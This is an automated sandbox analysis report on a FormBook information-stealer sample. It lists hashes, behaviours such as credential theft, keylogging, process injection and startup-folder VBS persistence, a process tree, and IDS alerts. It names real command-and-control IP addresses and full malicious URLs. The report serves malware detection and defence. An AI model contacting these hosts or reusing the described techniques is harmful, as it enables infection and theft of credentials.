Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CjbMEPJZ3J.exe

Overview

General Information

Sample name:CjbMEPJZ3J.exe
renamed because original name is a hash value
Original sample name:c89e812a906a0123f73aed0852b92e82ad0b0806659c1aa6d9fe80ff93268bd8.exe
Analysis ID:1631771
MD5:3945e5cdc5b6b04511d2288407890ee2
SHA1:b53b49f48b5c01ea24a4d6c45b14eb8a1ffe81f8
SHA256:c89e812a906a0123f73aed0852b92e82ad0b0806659c1aa6d9fe80ff93268bd8
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • CjbMEPJZ3J.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\CjbMEPJZ3J.exe" MD5: 3945E5CDC5B6B04511D2288407890EE2)
    • unnervously.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\CjbMEPJZ3J.exe" MD5: 3945E5CDC5B6B04511D2288407890EE2)
      • svchost.exe (PID: 6540 cmdline: "C:\Users\user\Desktop\CjbMEPJZ3J.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • RFZmq3QsG0cUeEpW31gsA.exe (PID: 4416 cmdline: "C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\U80MHbgl.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • raserver.exe (PID: 672 cmdline: "C:\Windows\SysWOW64\raserver.exe" MD5: D1053D114847677185F248FF98C3F255)
            • RFZmq3QsG0cUeEpW31gsA.exe (PID: 5844 cmdline: "C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\7DhraUXqO.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
            • firefox.exe (PID: 7360 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wscript.exe (PID: 6140 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • unnervously.exe (PID: 6444 cmdline: "C:\Users\user\AppData\Local\Melba\unnervously.exe" MD5: 3945E5CDC5B6B04511D2288407890EE2)
      • svchost.exe (PID: 6432 cmdline: "C:\Users\user\AppData\Local\Melba\unnervously.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.1307445094.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.1252330585.0000000002990000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000010.00000002.3546898290.0000000004EE0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.1252898618.0000000004750000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.3543179880.0000000002920000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                9.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  3.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2528, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbs" , ProcessId: 6140, ProcessName: wscript.exe
                    Sigma detected: Uncommon Svchost Parent Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\CjbMEPJZ3J.exe", CommandLine: "C:\Users\user\Desktop\CjbMEPJZ3J.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CjbMEPJZ3J.exe", ParentImage: C:\Users\user\AppData\Local\Melba\unnervously.exe, ParentProcessId: 6568, ParentProcessName: unnervously.exe, ProcessCommandLine: "C:\Users\user\Desktop\CjbMEPJZ3J.exe", ProcessId: 6540, ProcessName: svchost.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2528, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbs" , ProcessId: 6140, ProcessName: wscript.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\CjbMEPJZ3J.exe", CommandLine: "C:\Users\user\Desktop\CjbMEPJZ3J.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CjbMEPJZ3J.exe", ParentImage: C:\Users\user\AppData\Local\Melba\unnervously.exe, ParentProcessId: 6568, ParentProcessName: unnervously.exe, ProcessCommandLine: "C:\Users\user\Desktop\CjbMEPJZ3J.exe", ProcessId: 6540, ProcessName: svchost.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Melba\unnervously.exe, ProcessId: 6568, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unnervously.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-07T15:35:37.317159+010020507451Malware Command and Control Activity Detected192.168.2.1049686216.10.241.22880TCP
                    2025-03-07T15:36:01.110008+010020507451Malware Command and Control Activity Detected192.168.2.1049691162.218.30.23580TCP
                    2025-03-07T15:36:22.950035+010020507451Malware Command and Control Activity Detected192.168.2.104969584.32.84.3280TCP
                    2025-03-07T15:36:36.184664+010020507451Malware Command and Control Activity Detected192.168.2.104969913.248.169.4880TCP
                    2025-03-07T15:36:49.575343+010020507451Malware Command and Control Activity Detected192.168.2.1049703209.74.64.18980TCP
                    2025-03-07T15:37:11.444735+010020507451Malware Command and Control Activity Detected192.168.2.1049707104.21.3.10380TCP
                    2025-03-07T15:37:25.184568+010020507451Malware Command and Control Activity Detected192.168.2.1049711109.206.161.1580TCP
                    2025-03-07T15:37:47.408242+010020507451Malware Command and Control Activity Detected192.168.2.104971545.119.52.10980TCP
                    2025-03-07T15:38:08.980851+010020507451Malware Command and Control Activity Detected192.168.2.104971985.13.129.1680TCP
                    2025-03-07T15:38:22.399438+010020507451Malware Command and Control Activity Detected192.168.2.1049723188.114.97.380TCP
                    2025-03-07T15:38:36.321897+010020507451Malware Command and Control Activity Detected192.168.2.1049727188.114.96.380TCP
                    2025-03-07T15:38:58.471781+010020507451Malware Command and Control Activity Detected192.168.2.1049731216.10.241.22880TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-07T15:35:53.447043+010028554641A Network Trojan was detected192.168.2.1049688162.218.30.23580TCP
                    2025-03-07T15:35:56.013998+010028554641A Network Trojan was detected192.168.2.1049689162.218.30.23580TCP
                    2025-03-07T15:35:58.586183+010028554641A Network Trojan was detected192.168.2.1049690162.218.30.23580TCP
                    2025-03-07T15:36:14.970512+010028554641A Network Trojan was detected192.168.2.104969284.32.84.3280TCP
                    2025-03-07T15:36:17.576814+010028554641A Network Trojan was detected192.168.2.104969384.32.84.3280TCP
                    2025-03-07T15:36:20.348837+010028554641A Network Trojan was detected192.168.2.104969484.32.84.3280TCP
                    2025-03-07T15:36:28.522061+010028554641A Network Trojan was detected192.168.2.104969613.248.169.4880TCP
                    2025-03-07T15:36:31.076410+010028554641A Network Trojan was detected192.168.2.104969713.248.169.4880TCP
                    2025-03-07T15:36:33.629724+010028554641A Network Trojan was detected192.168.2.104969813.248.169.4880TCP
                    2025-03-07T15:36:41.868323+010028554641A Network Trojan was detected192.168.2.1049700209.74.64.18980TCP
                    2025-03-07T15:36:44.441561+010028554641A Network Trojan was detected192.168.2.1049701209.74.64.18980TCP
                    2025-03-07T15:36:46.997049+010028554641A Network Trojan was detected192.168.2.1049702209.74.64.18980TCP
                    2025-03-07T15:37:03.746347+010028554641A Network Trojan was detected192.168.2.1049704104.21.3.10380TCP
                    2025-03-07T15:37:06.069002+010028554641A Network Trojan was detected192.168.2.1049705104.21.3.10380TCP
                    2025-03-07T15:37:08.896691+010028554641A Network Trojan was detected192.168.2.1049706104.21.3.10380TCP
                    2025-03-07T15:37:17.268640+010028554641A Network Trojan was detected192.168.2.1049708109.206.161.1580TCP
                    2025-03-07T15:37:19.720563+010028554641A Network Trojan was detected192.168.2.1049709109.206.161.1580TCP
                    2025-03-07T15:37:22.420695+010028554641A Network Trojan was detected192.168.2.1049710109.206.161.1580TCP
                    2025-03-07T15:37:39.745307+010028554641A Network Trojan was detected192.168.2.104971245.119.52.10980TCP
                    2025-03-07T15:37:42.412573+010028554641A Network Trojan was detected192.168.2.104971345.119.52.10980TCP
                    2025-03-07T15:37:44.853771+010028554641A Network Trojan was detected192.168.2.104971445.119.52.10980TCP
                    2025-03-07T15:38:01.245084+010028554641A Network Trojan was detected192.168.2.104971685.13.129.1680TCP
                    2025-03-07T15:38:03.848896+010028554641A Network Trojan was detected192.168.2.104971785.13.129.1680TCP
                    2025-03-07T15:38:06.443320+010028554641A Network Trojan was detected192.168.2.104971885.13.129.1680TCP
                    2025-03-07T15:38:14.723464+010028554641A Network Trojan was detected192.168.2.1049720188.114.97.380TCP
                    2025-03-07T15:38:17.269502+010028554641A Network Trojan was detected192.168.2.1049721188.114.97.380TCP
                    2025-03-07T15:38:19.885533+010028554641A Network Trojan was detected192.168.2.1049722188.114.97.380TCP
                    2025-03-07T15:38:28.236365+010028554641A Network Trojan was detected192.168.2.1049724188.114.96.380TCP
                    2025-03-07T15:38:30.807499+010028554641A Network Trojan was detected192.168.2.1049725188.114.96.380TCP
                    2025-03-07T15:38:33.445776+010028554641A Network Trojan was detected192.168.2.1049726188.114.96.380TCP
                    2025-03-07T15:38:50.845514+010028554641A Network Trojan was detected192.168.2.1049728216.10.241.22880TCP
                    2025-03-07T15:38:53.405534+010028554641A Network Trojan was detected192.168.2.1049729216.10.241.22880TCP
                    2025-03-07T15:38:55.923280+010028554641A Network Trojan was detected192.168.2.1049730216.10.241.22880TCP
                    2025-03-07T15:39:04.341127+010028554641A Network Trojan was detected192.168.2.1049732162.218.30.23580TCP
                    2025-03-07T15:39:07.368692+010028554641A Network Trojan was detected192.168.2.1049733162.218.30.23580TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: CjbMEPJZ3J.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://www.asianoilporn.xyz/86jt/?bnb=31kc/+Wl6LN/FjYtTPSiktG84roXnqqnz7GUIvaRHGhqqc+FUh3yYBQHAVIb6krW3kfF/1gTEhEQBLRlhb5nKhJJaN8HQSgUBksp+ZppGJbxIuYULA==&8v4Hv=cpKH3hAvira URL Cloud: Label: malware
                    Source: http://www.shantimotors.net/fu2r/Avira URL Cloud: Label: malware
                    Source: http://www.811371bb10.buzz/ndeg/?bnb=uXJLLswkeLFohfURAMPuJRYZJIFZeHKicCSO+16N3FOsIDlKKFannZiNK3YSKlmUOi7C3rOjNqF7Pm+Goz2bTo8s6EsMYkoLyAOluneL74gw2IMsqg==&8v4Hv=cpKH3hAvira URL Cloud: Label: malware
                    Source: http://www.asianoilporn.xyz/86jt/Avira URL Cloud: Label: malware
                    Source: http://www.shantimotors.net/fu2r/?bnb=EjX2S1Ph5XCWfwV2QvfHosGqsbL/vcgmGyiovwl6Ejn/r4eSq3rluejL03/CrYuM4rTvYIVMAFTPgdzHeiaMFiTDupOQ6GxecuxHMcGZHTFSd/J1kA==&8v4Hv=cpKH3hAvira URL Cloud: Label: malware
                    Source: http://www.promocao.info/ed4z/Avira URL Cloud: Label: malware
                    Source: http://www.811371bb10.buzz/ndeg/Avira URL Cloud: Label: malware
                    Source: http://www.promocao.info/ed4z/?8v4Hv=cpKH3h&bnb=yvQWRGIF7wqskWcEihREgOF3mDQzbLWLgQ6Ho1Uwm5eAhcT9VUrz7M/8x6oZcsrnqTsCKimVQPb/zM1n2v8k200id06KIOLa4AqE9dQmcjV36VMZ2g==Avira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeAvira: detection malicious, Label: TR/AD.Swotter.wjmrj
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeReversingLabs: Detection: 73%
                    Multi AV Scanner detection for submitted file
                    Source: CjbMEPJZ3J.exeVirustotal: Detection: 52%Perma Link
                    Source: CjbMEPJZ3J.exeReversingLabs: Detection: 73%
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.1307445094.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1252330585.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3546898290.0000000004EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1252898618.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3543179880.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1252099883.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3544967404.0000000004790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3545019349.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3545054686.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: CjbMEPJZ3J.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: wntdll.pdbUGP source: unnervously.exe, 00000002.00000003.1119418030.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, unnervously.exe, 00000002.00000003.1120126579.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1252489735.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1145281265.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1252489735.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1143508760.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3545167992.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.1252135632.0000000004698000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3545167992.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.1254142856.0000000004844000.00000004.00000020.00020000.00000000.sdmp, unnervously.exe, 00000008.00000003.1271723340.0000000003640000.00000004.00001000.00020000.00000000.sdmp, unnervously.exe, 00000008.00000003.1261684311.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1307779293.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1307779293.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1287602484.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1289748764.0000000003400000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: unnervously.exe, 00000002.00000003.1119418030.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, unnervously.exe, 00000002.00000003.1120126579.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.1252489735.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1145281265.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1252489735.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1143508760.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3545167992.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.1252135632.0000000004698000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3545167992.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000005.00000003.1254142856.0000000004844000.00000004.00000020.00020000.00000000.sdmp, unnervously.exe, 00000008.00000003.1271723340.0000000003640000.00000004.00001000.00020000.00000000.sdmp, unnervously.exe, 00000008.00000003.1261684311.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1307779293.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1307779293.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1287602484.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1289748764.0000000003400000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: RAServer.pdb source: svchost.exe, 00000003.00000003.1217812960.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1217716605.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000002.3544472131.000000000127E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: svchost.pdb source: raserver.exe, 00000005.00000002.3543702437.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3545676916.000000000501C000.00000004.10000000.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000000.1332887721.0000000002AAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1606462894.0000000004FBC000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: RAServer.pdbGCTL source: svchost.exe, 00000003.00000003.1217812960.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1217716605.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000002.3544472131.000000000127E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: svchost.pdbUGP source: raserver.exe, 00000005.00000002.3543702437.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000005.00000002.3545676916.000000000501C000.00000004.10000000.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000000.1332887721.0000000002AAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.1606462894.0000000004FBC000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000000.1164546841.0000000000D1F000.00000002.00000001.01000000.00000005.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000000.1332548834.0000000000D1F000.00000002.00000001.01000000.00000005.sdmp
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00194696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00194696
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019C93C FindFirstFileW,FindClose,0_2_0019C93C
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0019C9C7
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0019F200
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0019F35D
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0019F65E
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00193A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00193A2B
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00193D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00193D4E
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0019BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0019BF27
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00074696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00074696
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007C93C FindFirstFileW,FindClose,2_2_0007C93C
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0007C9C7
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0007F200
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0007F35D
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0007F65E
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00073A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00073A2B
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00073D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00073D4E
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0007BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0007BF27

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49686 -> 216.10.241.228:80
